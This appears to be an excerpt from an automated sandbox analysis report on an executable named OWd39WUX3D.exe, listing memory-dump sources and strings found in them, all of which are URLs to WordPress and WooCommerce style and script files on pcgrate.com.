              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.5.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touc
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/compatibility/elementor/elementor-global.min.cs
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/main.min.css?ver=9.12.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/FontAwesome/css/all.min.css?ver=9.12.0
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/icomoon-the7-font/icomoon-the7-font.min.css?v
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/above-the-fold.min.js?ver=9.12.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/compatibility/woocommerce/woocommerce.min.js?ver
